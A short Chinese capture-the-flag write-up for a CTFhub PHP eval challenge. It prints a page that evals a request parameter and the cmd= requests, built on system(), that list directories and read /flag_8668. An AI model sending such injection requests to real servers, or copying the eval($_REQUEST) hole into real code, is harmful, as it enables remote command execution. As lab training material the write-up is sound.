CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
lizhongxuan6 小时前
Claude Code 防上下文爆炸:源码级深度解析
前端·后端
Via_Neo6 小时前
JAVA中以2为底的对数表示方式
java·开发语言
野生技术架构师7 小时前
一线大厂Java面试八股文全栈通关手册(含源码级详解)
java·开发语言·面试
廋到被风吹走7 小时前
【AI】Codex 多语言实测:Python/Java/JS/SQL 效果横评
java·人工智能·python
柳杉7 小时前
震惊!字符串还能这么玩!
前端·javascript
tERS ERTS8 小时前
MySQL中查看表结构
java
坊钰8 小时前
Java 死锁问题及其解决方案
java·开发语言·数据库
于先生吖8 小时前
SpringBoot+MQTT 无人健身房智能管控系统源码实战
java·spring boot·后端
是上好佳佳佳呀8 小时前
【前端(五)】CSS 知识梳理:浮动与定位
前端·css
仍然.8 小时前
算法题目---模拟
java·javascript·算法
热门推荐
01GitHub 镜像站点022026年3月AI领域大事件:DeepSeek引领开源风暴03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05UV安装并设置国内源06如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解07让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南08AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南09深扒 Claude Code Buddy 模式:一只仙人掌背后的确定性随机算法10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)